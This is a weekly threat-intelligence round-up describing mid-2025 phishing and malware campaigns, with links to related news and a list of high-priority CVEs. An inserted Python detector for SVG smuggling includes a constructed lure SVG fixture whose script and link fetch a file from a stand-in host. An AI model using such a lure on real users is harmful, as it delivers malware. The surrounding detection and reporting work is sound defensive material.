
Weekly Cyber Round-up

Intelligence Report

June 26, 2025

Educated Manticore targets Israeli academics and cybersecurity experts to steal credentials

Starting in mid-June 2025, Check Point researchers observed a spear phishing campaign, attributed to the Iranian threat actor Educated Manticore, that targets Israeli journalists, high-profile cybersecurity experts, and computer science professors from leading Israeli universities. The group aims to direct victims to fake Gmail, Outlook, or Yahoo login pages, or to fake Google Meet invitations, in order to steal credentials. Victims are approached via email or WhatsApp messages purporting to come from a researcher or journalist seeking a discussion. The initial messages contain no links; the attackers first gain the victim’s trust and only then send links to the custom phishing kits. The phishing kits are implemented as a Single Page Application built with React and use dynamic page routing, while real-time WebSocket connections are used to send stolen data.


Shadow Vector campaign uses SVG smuggling to target Colombia with AsyncRAT and RemcosRAT

Acronis researchers discovered an active spear phishing campaign, dubbed Shadow Vector, targeting users in Colombia with malicious SVG files masquerading as urgent court notifications to deliver AsyncRAT and RemcosRAT. The phishing emails contain a link to a password-protected ZIP archive hosted on public file-sharing platforms such as Bitbucket, Discord CDN, and YDRAY. The archive contains a legitimate and benign DLL and a malicious DLL, with the latter sideloaded to allow the malware to run within a trusted process and evade detection. Once server communication is established, the malware transmits victim details and checks for the presence of cryptocurrency wallets and specific browser extensions. A newer version of the campaign adopts a modular approach and deploys a loader associated with Katz Stealer.
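A defender-side triage check for the SVG smuggling technique named above, added here as an example and not taken from the page or the Acronis report. It assumes the usual markers of a smuggling SVG (inline script or foreignObject, event-handler attributes, outbound or data: links, large base64 blobs) and runs on constructed sample files rather than the campaign's own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: a plain drawing and a lure-style SVG (not the real campaign files).
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<rect width="10" height="10" fill="blue"/></svg>"""

SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="https://example.invalid/notificacion.zip"><text y="20">Notificacion judicial</text></a>
<script>window.location = "https://example.invalid/descarga";</script>
</svg>"""

# Elements that let an SVG carry HTML or script, which a static image never needs.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed"}


def svg_smuggling_indicators(svg_text: str) -> list[str]:
    """Return the reasons an SVG looks like a script/HTML smuggling vector; [] if clean."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Malformed XML is itself worth a look: renderers are far more forgiving than parsers.
        return [f"unparseable XML ({exc}); treat as suspicious"]
    for el in root.iter():
        tag = el.tag.split("}", 1)[-1]  # strip the namespace prefix
        if tag in ACTIVE_TAGS:
            findings.append(f"active content element <{tag}>")
        for attr, value in el.attrib.items():
            name = attr.split("}", 1)[-1]
            if name.startswith("on"):  # onload=, onclick=, ... run script on open
                findings.append(f"event handler attribute {name}= on <{tag}>")
            if name == "href" and re.match(r"(?i)(https?:|javascript:|data:)", value.strip()):
                findings.append(f"external/data link {value[:60]} on <{tag}>")
    # A long base64-like run usually means an embedded payload or a second-stage page.
    if re.search(r"[A-Za-z0-9+/]{200,}={0,2}", svg_text):
        findings.append("large base64-like blob")
    return findings
```

Run it over mail-gateway attachments with an .svg extension; any non-empty result is a reason to detonate or quarantine rather than deliver.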

Silver Fox targets healthcare and public sector with trojanised medical software

Picus Security researchers identified a multi-stage campaign by the Silver Fox advanced persistent threat group targeting healthcare delivery organisations with trojanised medical software and cloud infrastructure. The campaign aims to deploy remote access tools, such as Winos 4.0, disable anti-virus defences, and exfiltrate data from healthcare and public sector targets. In one campaign, Silver Fox embedded backdoors in Philips DICOM viewers, EmEditor, and system driver utilities, which functioned as first-stage loaders and downloaded encrypted payloads from Alibaba Cloud storage. The campaign ultimately deployed Winos 4.0, a keylogger, and a cryptocurrency miner, with a scheduled task registered to maintain persistence. Silver Fox has also leveraged backdoored installers for applications such as Google Chrome, VPN clients, deepfake tools, and artificial intelligence tools. Another campaign distributed spear phishing emails impersonating Taiwan’s National Taxation Bureau. Similarly, a campaign dubbed Operation Holding Hands targeted organisations in Japan and Taiwan using digitally signed fake salary notices.

APT36 phishing campaign targets Indian defence personnel with credential-stealing malware

CYFIRMA researchers observed the advanced persistent threat group APT36 actively targeting Indian defence personnel through highly sophisticated phishing campaigns. The group distributes phishing emails containing malicious PDF attachments designed to resemble official government documents. The emails contain a link that redirects victims to a phishing page imitating the login interface of India’s National Informatics Centre, which ultimately leads to the installation of a ZIP archive containing credential-stealing malware disguised as a legitimate application. The malware is executed in memory and is capable of interacting with user sessions, injecting code, evading detection, maintaining persistence, and more.

OneClik campaign abuses ClickOnce to target energy, oil and gas sector with RunnerBeacon

Trellix researchers discovered a sophisticated malware campaign, dubbed OneClik, that is targeting the energy, oil, and gas sector via phishing attacks and the exploitation of Microsoft ClickOnce. Three variants of the campaign, v1a, BPI-MDM, and v1d, were identified, each deploying a Golang backdoor, dubbed RunnerBeacon, via a .NET loader, dubbed OneClikNet, that uses AppDomainManager hijacking. Each version of the campaign has evolved with more advanced tactics and C2 obfuscation. The attackers send emails with links to a fake ‘hardware analysis’ site which, once visited, leads to a ClickOnce manifest disguised as a legitimate tool. The threat actors use legitimate AWS cloud services for their C2 to evade detection. The tactics, tools, and techniques used in the campaign align with China-linked actors; however, the researchers have not made a definitive attribution.

Ransomware

Qilin ransomware attack on NHS supplier contributed to patient fatality – The Register – Security – Jun 26 2025
Dire Wolf Ransomware Comes Out Snarling, Bites Technology, Manufacturing – Dark Reading – Jun 25 2025
The State of Ransomware 2025 – Sophos – Jun 24 2025
Revil ransomware members released after time served on carding charges – Bleeping Computer – Jun 23 2025
Qilin Ransomware Adds “Call Lawyer” Feature to Pressure Victims for Larger Ransoms – The Hacker News – Jun 20 2025

Financial Services

Cybercriminals Abuse Open-Source Tools To Target Africa’s Financial Sector – Unit 42 – Palo Alto Networks Blog – Jun 24 2025
Trezor’s support platform abused in crypto theft phishing attacks – Bleeping Computer – Jun 24 2025
Cointelegraph and CoinMarketCap front ends compromised with scam links over the weekend – CryptoSlate – Jun 23 2025
Aflac Finds Suspicious Activity on US Network That May Impact Social Security Numbers, Other Data – SecurityWeek RSS Feed – Jun 21 2025
Declaration trap: Crypto Drainers masquerading as European Tax Authorities – Group-IB – Jun 19 2025

Geopolitics

Another Wave: North Korean Contagious Interview Campaign Drops 35 New Malicious npm Packages – Socket – Jun 25 2025
APT28 hackers use Signal chats to launch new malware attacks on Ukraine – Bleeping Computer – Jun 23 2025
Middle East Cyber Escalation: From Hacktivism to Sophisticated Threat Operations – Group-IB – Jun 23 2025
Unmasking A New China-Linked Covert ORB Network: Inside the LapDogs Campaign – SecurityScorecard – Jun 23 2025
Part 1: The Iran-Israel Cyber Standoff – The Hacktivist Front – CloudSEK Blog – Jun 19 2025

High Priority Vulnerabilities

Each entry lists the CVE name, the affected software, the CVSS Base Score and the Temporal Score.

CVE-2025-6543 – NetScaler Gateway – Base Score 8.1 – Temp Score 7.7
Related: Critical flaw in NetScaler ADC and NetScaler Gateway exploited as zero-day

CVE-2025-4322 – Motors Plugin – Base Score 9.8 – Temp Score 7.1
Related: Attackers Actively Exploiting Critical Vulnerability in Motors Theme

CVE-2025-49132 – panel – Base Score 10.0 – Temp Score 8.4
Related: Recently patched maximum-severity remote code execution flaw in Pterodactyl actively exploited

CVE-2025-27363 – FreeType – Base Score 8.1 – Temp Score 5.6
Related: FreeType Zero-Day Found by Meta Exploited in Paragon Spyware Attacks

CVE-2025-52921 – InnoShop – Base Score 4.7 – Temp Score 4.6
Related: Multiple critical and high-severity flaws discovered in InnoShop
